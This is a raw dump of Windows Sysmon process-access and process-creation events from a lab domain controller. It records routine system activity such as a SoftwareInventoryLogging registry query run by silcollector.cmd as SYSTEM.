10:40:54.450{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E36-5F80-8800-000000007F01}4452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3E36-5F80-8700-000000007F01}44364444C:\Windows\system32\cmd.exe{733EE690-3E36-5F80-8800-000000007F01}4452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.463{733EE690-3E36-5F80-8800-000000007F01}4452C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{733EE690-3E36-5F80-8700-000000007F01}4436C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3E36-5F80-8600-000000007F01}40844428C:\Windows\system32\conhost.exe{733EE690-3E36-5F80-8700-000000007F01}4436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E36-5F80-8700-000000007F01}4436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3E36-5F80-8500-000000007F01}44042952C:\Windows\system32\cmd.exe{733EE690-3E36-5F80-8700-000000007F01}4436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.456{733EE690-3E36-5F80-8700-000000007F01}4436C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E36-5F80-8500-000000007F01}4404C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3E36-5F80-8600-000000007F01}40844428C:\Windows\system32\conhost.exe{733EE690-3E36-5F80-8500-000000007F01}4404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E36-5F80-8600-000000007F01}4084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E36-5F80-8500-000000007F01}4404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 